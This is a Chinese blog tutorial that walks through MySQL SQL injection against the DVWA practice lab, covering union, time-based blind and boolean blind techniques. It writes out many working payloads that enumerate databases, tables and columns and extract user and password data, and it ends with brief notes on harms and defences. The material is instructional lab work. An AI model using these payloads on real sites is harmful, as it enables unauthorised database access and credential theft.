<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"kvmtnk.top","root":"/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="什么是注入攻击  服务器在接受客户端的查询参数后，未对查询参数进行严格过滤，导致恶意用户可以在查询参数中插入恶意sql语句来查询数据库敏感信息，最终导致数据库信息泄露。 攻击方式 联合查询注入 报错注入 布尔型盲注 延时盲注  判断是否存在注入漏洞以DVWA靶场为例输入单引号’ 出现报错，可能存在sql注入 正常输入 1SQL注入语句解析：mysql&gt; select first_name,l">
<meta property="og:type" content="article">
<meta property="og:title" content="MySQL注入攻击">
<meta property="og:url" content="http://kvmtnk.top/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="Wyattt&#39;s Notes">
<meta property="og:description" content="什么是注入攻击  服务器在接受客户端的查询参数后，未对查询参数进行严格过滤，导致恶意用户可以在查询参数中插入恶意sql语句来查询数据库敏感信息，最终导致数据库信息泄露。 攻击方式 联合查询注入 报错注入 布尔型盲注 延时盲注  判断是否存在注入漏洞以DVWA靶场为例输入单引号’ 出现报错，可能存在sql注入 正常输入 1SQL注入语句解析：mysql&gt; select first_name,l">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://kvmtnk.top/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/1.png">
<meta property="og:image" content="http://kvmtnk.top/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/2.png">
<meta property="og:image" content="http://kvmtnk.top/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/11.png">
<meta property="og:image" content="http://kvmtnk.top/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/3.png">
<meta property="og:image" content="http://kvmtnk.top/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/4.png">
<meta property="og:image" content="http://kvmtnk.top/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/5.png">
<meta property="og:image" content="http://kvmtnk.top/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/6.png">
<meta property="og:image" content="http://kvmtnk.top/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/7.png">
<meta property="og:image" content="http://kvmtnk.top/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/8.png">
<meta property="og:image" content="http://kvmtnk.top/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/9.png">
<meta property="og:image" content="http://kvmtnk.top/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/10.png">
<meta property="og:image" content="http://kvmtnk.top/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/12.png">
<meta property="og:image" content="http://kvmtnk.top/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/13.png">
<meta property="og:image" content="http://kvmtnk.top/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/14.png">
<meta property="og:image" content="http://kvmtnk.top/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/15.png">
<meta property="og:image" content="http://kvmtnk.top/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/16.png">
<meta property="og:image" content="http://kvmtnk.top/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/17.png">
<meta property="article:published_time" content="2020-08-19T08:47:03.000Z">
<meta property="article:modified_time" content="2020-08-21T03:46:20.569Z">
<meta property="article:author" content="Wyattt">
<meta property="article:tag" content="网络安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://kvmtnk.top/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/1.png">

<link rel="canonical" href="http://kvmtnk.top/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>MySQL注入攻击 | Wyattt's Notes</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Wyattt's Notes</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://kvmtnk.top/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Wyattt">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Wyattt's Notes">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          MySQL注入攻击
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-08-19 16:47:03" itemprop="dateCreated datePublished" datetime="2020-08-19T16:47:03+08:00">2020-08-19</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-08-21 11:46:20" itemprop="dateModified" datetime="2020-08-21T11:46:20+08:00">2020-08-21</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="什么是注入攻击"><a href="#什么是注入攻击" class="headerlink" title="什么是注入攻击"></a>什么是注入攻击</h1><p>  服务器在接受客户端的查询参数后，未对查询参数进行严格过滤，导致恶意用户可以在查询参数中插入恶意sql语句来查询数据库敏感信息，最终导致数据库信息泄露。</p>
<h1 id="攻击方式"><a href="#攻击方式" class="headerlink" title="攻击方式"></a>攻击方式</h1><ol>
<li>联合查询注入</li>
<li>报错注入</li>
<li>布尔型盲注</li>
<li>延时盲注</li>
</ol>
<h1 id="判断是否存在注入漏洞"><a href="#判断是否存在注入漏洞" class="headerlink" title="判断是否存在注入漏洞"></a>判断是否存在注入漏洞</h1><p>以DVWA靶场为例<br>输入单引号’<br> <img src="/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/1.png"><br><img src="/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/2.png"><br>出现报错，可能存在sql注入</p>
<p>正常输入 1<br><img src="/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/11.png"><br>SQL注入语句解析：<br><code>mysql&gt; select first_name,last_name from dvwa.users; </code><br><code>mysql&gt; select first_name,last_name from dvwa.users where user_id=&#39;1&#39;;</code><br>你输入1 相当于在最后的两个单引号中间插入一个1来执行mysql的查询语句</p>
<p>输入1’and’1’=’1  (1’和前面的单引号’闭合,’1和后面的单引号’闭合了)<br><img src="/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/3.png"><br><code>SELECT first_name, last_name FROM users WHERE user_id = &#39;1&#39; and &#39;1&#39; =&#39;1&#39;</code></p>
<p>继续输入1’and’1’=’2<br><code>SELECT first_name, last_name FROM users WHERE user_id = &#39;1&#39; and &#39;1&#39; =&#39;2&#39;</code><br>  没有返回任何画面</p>
<p>  判断可能为字符型注入</p>
<h2 id="猜字段"><a href="#猜字段" class="headerlink" title="猜字段"></a>猜字段</h2><p>  输入1’ order by 1 #  (#号表示注释)<br>  <img src="/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/4.png"></p>
<p>  继续输入1’ order by 1#和1’ order by 2#都显示</p>
<p>  当输入1’ order by 3#时<br>  <img src="/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/5.png"></p>
<p>  出现了报错，证明只有两个字段</p>
<h1 id="联合查询"><a href="#联合查询" class="headerlink" title="联合查询"></a>联合查询</h1><h2 id="收集信息"><a href="#收集信息" class="headerlink" title="收集信息"></a>收集信息</h2><h3 id="获取当前数据库和数据库用户名"><a href="#获取当前数据库和数据库用户名" class="headerlink" title="获取当前数据库和数据库用户名"></a>获取当前数据库和数据库用户名</h3><p>  <code>1&#39; union select database(),user() #</code><br>  <img src="/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/6.png"><br>  显示得到当前的数据库名为dvwa,数据库用户名为root@localhost</p>
<h3 id="获取数据库版本和操作系统版本"><a href="#获取数据库版本和操作系统版本" class="headerlink" title="获取数据库版本和操作系统版本"></a>获取数据库版本和操作系统版本</h3><p>  <code>1&#39; union select version(),@@version_compile_os#</code><br>  <img src="/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/7.png"></p>
<h2 id="为什么要获取数据"><a href="#为什么要获取数据" class="headerlink" title="为什么要获取数据"></a>为什么要获取数据</h2><p>  我们需要判断MySQL的版本。因为当MySQL的版本小于4.0时，是不支持union select联合查询的；<br>  当MySQL版本大于5.0时，有个默认数据库information_schema，保存了 Mysql服务器所有数据库的信息,如数据库名，数据库的表，<br>  表栏的数据类型与访问权限等。该数据库拥有一个名为 tables 的数据表，该表包含两个字段 table_name 和table_schema，分别记录 DBMS 中的存储的表名和表名所在的数据库。</p>
<h2 id="获取数据表名"><a href="#获取数据表名" class="headerlink" title="获取数据表名"></a>获取数据表名</h2><p>  <code>1&#39; union select table_name,table_schema from information_schema.tables where table_schema=&#39;dvwa&#39; #</code><br>  <img src="/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/8.png"></p>
<p>  在information_schema数据库库的表中查询有关dvwa数据库的表</p>
<p>  这里获取到了有dvwa的数据库里有两张表guestbook和users</p>
<p>  我们对users表进行查询获取表中的列名</p>
<p>  <code>1&#39; union select 1,group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39; #</code></p>
<p>  group_concat(column_name)函数可列举该字段的所有内容<br>  <img src="/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/9.png"></p>
<h3 id="获取users表中的数据user，password字段信息"><a href="#获取users表中的数据user，password字段信息" class="headerlink" title="获取users表中的数据user，password字段信息"></a>获取users表中的数据user，password字段信息</h3><p>  <img src="/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/10.png"></p>
<h1 id="基于时间盲注"><a href="#基于时间盲注" class="headerlink" title="基于时间盲注"></a>基于时间盲注</h1><h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><p>  and if((length(database())&gt;5),sleep(5),0)</p>
<p>构造逻辑语句，通过条件语句进行判断，为真时则延时执行，为假时立即执行</p>
<h3 id="什么情况下使用延时盲注"><a href="#什么情况下使用延时盲注" class="headerlink" title="什么情况下使用延时盲注"></a>什么情况下使用延时盲注</h3><p>  当既不回显数据，也不回显错误信息时</p>
<p>  联合查询，报错查询和布尔盲注在此时不起作用时</p>
<p>  if函数</p>
<p>  格式： if(condition,a,b)</p>
<p>  含义：如果condition成立，则a，否则b</p>
<p>  条件：mysql&gt;=5.0 使用sleep()进行查询<br>        mysql&lt;5.0 使用benchmark()进行查询</p>
<h2 id="判断是否存在注入"><a href="#判断是否存在注入" class="headerlink" title="判断是否存在注入"></a>判断是否存在注入</h2><p>  输入1’ and sleep(5)#<br>  <img src="/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/12.png"><br>  耗时了5秒，证明存在注入</p>
<h3 id="猜解数据库名长度"><a href="#猜解数据库名长度" class="headerlink" title="猜解数据库名长度"></a>猜解数据库名长度</h3><p>1’ and if(length(database())=4,sleep(5),1)#</p>
<h3 id="猜解数据库名称"><a href="#猜解数据库名称" class="headerlink" title="猜解数据库名称"></a>猜解数据库名称</h3><p>1’ and if(ascii(substr(database(),1,1))=100,sleep(5),1)#</p>
<p>出现延时</p>
<p>以次猜解得到数据库名称为dvwa</p>
<h3 id="猜解数据库中有几张表"><a href="#猜解数据库中有几张表" class="headerlink" title="猜解数据库中有几张表"></a>猜解数据库中有几张表</h3><p>1’ and if((select count(table_name) from information_schema.tables where table_schema=’dvwa’)=2,sleep(5),1)#</p>
<h3 id="猜解表名称的长度"><a href="#猜解表名称的长度" class="headerlink" title="猜解表名称的长度"></a>猜解表名称的长度</h3><p>1’ and if(length((select table_name from information_schema.tables where table_schema=’dvwa’ limit 0,1))=9,sleep(5),1)# </p>
<h3 id="猜解第二个表的长度"><a href="#猜解第二个表的长度" class="headerlink" title="猜解第二个表的长度"></a>猜解第二个表的长度</h3><p>1’ and if(length((select table_name from information_schema.tables where table_schema=’dvwa’ limit 1,1))=5,sleep(5),1)#  </p>
<h3 id="猜解表的名称"><a href="#猜解表的名称" class="headerlink" title="猜解表的名称"></a>猜解表的名称</h3><p>猜解第一个表</p>
<p>1’ and if(ascii(substr((select table_name from information_schema.tables where table_schema=’dvwa’ limit 0,1),1,1))=103,sleep(5),1)#  </p>
<p>猜解字段名</p>
<p>猜解users表中有几个字段</p>
<p>1’ and if((select count(column_name) from information_schema.columns where table_name=’users’)=8,sleep(5),1)#</p>
<p>猜解字段名称同上</p>
<h1 id="布尔型盲注"><a href="#布尔型盲注" class="headerlink" title="布尔型盲注"></a>布尔型盲注</h1><p>  原理：<br>  对数据库进行猜解，进行拼凑</p>
<h2 id="盲注常用函数"><a href="#盲注常用函数" class="headerlink" title="盲注常用函数"></a>盲注常用函数</h2><p>  length() 返回字符串的长度，例如可以返回数据库名的长度</p>
<p>  substr() 用来截取字符串</p>
<p>  ascii() 返回字符的ascill码</p>
<p>  sleep(n) 将程序挂在一段时间，n为n秒</p>
<h2 id="猜数据库名"><a href="#猜数据库名" class="headerlink" title="猜数据库名"></a>猜数据库名</h2><h3 id="猜长度"><a href="#猜长度" class="headerlink" title="猜长度"></a>猜长度</h3><p>  输入 1’ and length(database())=1 #<br>  <img src="/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/13.png"></p>
<p>  不存在</p>
<p>  继续输入 1’ and length(database())=4 #<br>  <img src="/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/14.png"><br>  存在</p>
<h2 id="猜解数据库名字符串"><a href="#猜解数据库名字符串" class="headerlink" title="猜解数据库名字符串"></a>猜解数据库名字符串</h2><p>  二分法逐字猜解<br>  输入 <code>1&#39; and ascii(substr(database(),1,1))&gt;97 #</code><br>  <img src="/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/15.png"><br>  显示存在，ascii码97代表a，说明数据库名第一个字符串是大于a</p>
<p>  substr()函数</p>
<p>  语法：</p>
<p>  substr(string,start,length)</p>
<p>  string代表字符串，start开始位置，长度如果没有，那就是默认</p>
<p>  因为有26个英文字母，最后一个字母为z，ascii码为122,所以我们直接查询数据库最后一个字母，看是否存在</p>
<p>  输入  <code>1&#39; and ascii(substr(database(),1,1))&lt;122 #</code><br>  <img src="/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/16.png"></p>
<p>  存在</p>
<p>  以下查询109，103存在</p>
<p>  查询&lt;100</p>
<p>  <img src="/2020/08/19/MySQL%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5/17.png"></p>
<p>  不存在</p>
<p>  查询&gt;100<br>  也不存在<br>  证明数据库名第一个字符ascii码为100，也就是小写字母d</p>
<p>  输入以上步骤直到得到完整的数据库名dvwa</p>
<p>  格式：<code>1&#39; and ascii(substr(database(),n,1))&gt;100 #</code></p>
<p>  n第几个字符</p>
<h2 id="猜解表名"><a href="#猜解表名" class="headerlink" title="猜解表名"></a>猜解表名</h2><p>猜解表的数量</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#39; and (select count(table_name) from information_schema.table where table_schema&#x3D;database())&#x3D;1 #</span><br></pre></td></tr></table></figure>
<p>  显示不存在</p>
<pre><code>1&#39; and (select count(table_name) from information_schema.tables where table_schema=database())=2 #
```显示存在

证明dvwa库里有两张表

## 猜解第一个表的长度

`1&#39; and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 #`

显示不存在

。。。

。。。

`1&#39; and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #`

显示存在

## 猜解第一个表的名字

`1&#39; and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))&gt;97 #`

显示存在

。。。

。。。

以次猜解

重复操作得出表名为guestbook,users
格式：`1&#39; and ascii(substr((select table_name from information_schema.tables where
table_schema=database() limit 0,1),n,1))&gt;97 #`

## 猜解表中的字段名

猜解字段的数量

`1&#39; and (select count(column_name) from information_schema.columns where table_name=&#39;users&#39;)=1 #`

显示不存在

=8

显示存在

### 猜解第一个字段的长度

`1&#39; and length(substr((select column_name from information_schema.columns where table_name=&#39;users&#39; limit 0,1),1))=1 # `

显示不存在

`1&#39; and length(substr((select column_name from information_schema.columns where table_name=&#39;users&#39; limit 0,1),1))=7 # `

显示存在

猜解第一个字段名

`1&#39; and ascii(substr((select column_name from information_schema.columns where table_name=&#39;users&#39; limit 0,1),1,1))&gt;97 #`

显示存在

。。。

。。。
## 猜解数据

and ascii (substr((select user from dvwa.users limit 0,1),1,1))&gt;96 #

......

### 暴力猜解

`1&#39; and (select count(*) from users where user = &#39;admin&#39;) = 1#  `

# SQL注入危害
  1. 数据库信息泄露
  2. 网站挂马：当拿到webshell时，将木马挂在服务器上攻击别人
  3. 读取文件获取webshell

  # 如何防范
  1. 对特殊字符进行编码转换--比如开启gpc（默认开启）
  2. 不要使用管理员权限的数据连接，最好为每个应用使用单独的数据连接
  3. 尽量少给提示
  4. 使用安全产品

### 其他
联合查询：合并多个相似的选择查询结果

联合查询限制条件：必须由两条或两条以上的select语句组成，语句之间用关键字union分隔

                  union中的每个查询必须包含相同的列

不管是报错还联合注入都是基于整型和字符型注入这两种类型下的

报错注入：由于配置不当，错误信息被输出到前台，导致攻击者根据报错信息进行一系列操作

延时注入和布尔注入共同点：都是一个字符一个字符爆出来的，耗费时间长，都没有显示位，都要ASCII码推算  

</code></pre>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" rel="tag"># 网络安全</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item"></div>
      <div class="post-nav-item">
    <a href="/2020/08/20/MySQL%E6%B3%A8%E5%85%A5%E4%B9%8B%E6%9D%83%E9%99%90%E5%A4%84%E7%90%86/" rel="next" title="MySQL注入之权限处理">
      MySQL注入之权限处理 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB"><span class="nav-number">1.</span> <span class="nav-text">什么是注入攻击</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%94%BB%E5%87%BB%E6%96%B9%E5%BC%8F"><span class="nav-number">2.</span> <span class="nav-text">攻击方式</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%88%A4%E6%96%AD%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"><span class="nav-number">3.</span> <span class="nav-text">判断是否存在注入漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%8C%9C%E5%AD%97%E6%AE%B5"><span class="nav-number">3.1.</span> <span class="nav-text">猜字段</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2"><span class="nav-number">4.</span> <span class="nav-text">联合查询</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%94%B6%E9%9B%86%E4%BF%A1%E6%81%AF"><span class="nav-number">4.1.</span> <span class="nav-text">收集信息</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96%E5%BD%93%E5%89%8D%E6%95%B0%E6%8D%AE%E5%BA%93%E5%92%8C%E6%95%B0%E6%8D%AE%E5%BA%93%E7%94%A8%E6%88%B7%E5%90%8D"><span class="nav-number">4.1.1.</span> <span class="nav-text">获取当前数据库和数据库用户名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE%E5%BA%93%E7%89%88%E6%9C%AC%E5%92%8C%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E7%89%88%E6%9C%AC"><span class="nav-number">4.1.2.</span> <span class="nav-text">获取数据库版本和操作系统版本</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE"><span class="nav-number">4.2.</span> <span class="nav-text">为什么要获取数据</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE%E8%A1%A8%E5%90%8D"><span class="nav-number">4.3.</span> <span class="nav-text">获取数据表名</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96users%E8%A1%A8%E4%B8%AD%E7%9A%84%E6%95%B0%E6%8D%AEuser%EF%BC%8Cpassword%E5%AD%97%E6%AE%B5%E4%BF%A1%E6%81%AF"><span class="nav-number">4.3.1.</span> <span class="nav-text">获取users表中的数据user，password字段信息</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%9F%BA%E4%BA%8E%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8"><span class="nav-number">5.</span> <span class="nav-text">基于时间盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8E%9F%E7%90%86"><span class="nav-number">5.1.</span> <span class="nav-text">原理</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%83%85%E5%86%B5%E4%B8%8B%E4%BD%BF%E7%94%A8%E5%BB%B6%E6%97%B6%E7%9B%B2%E6%B3%A8"><span class="nav-number">5.1.1.</span> <span class="nav-text">什么情况下使用延时盲注</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A4%E6%96%AD%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8%E6%B3%A8%E5%85%A5"><span class="nav-number">5.2.</span> <span class="nav-text">判断是否存在注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%8C%9C%E8%A7%A3%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D%E9%95%BF%E5%BA%A6"><span class="nav-number">5.2.1.</span> <span class="nav-text">猜解数据库名长度</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%8C%9C%E8%A7%A3%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D%E7%A7%B0"><span class="nav-number">5.2.2.</span> <span class="nav-text">猜解数据库名称</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%8C%9C%E8%A7%A3%E6%95%B0%E6%8D%AE%E5%BA%93%E4%B8%AD%E6%9C%89%E5%87%A0%E5%BC%A0%E8%A1%A8"><span class="nav-number">5.2.3.</span> <span class="nav-text">猜解数据库中有几张表</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%8C%9C%E8%A7%A3%E8%A1%A8%E5%90%8D%E7%A7%B0%E7%9A%84%E9%95%BF%E5%BA%A6"><span 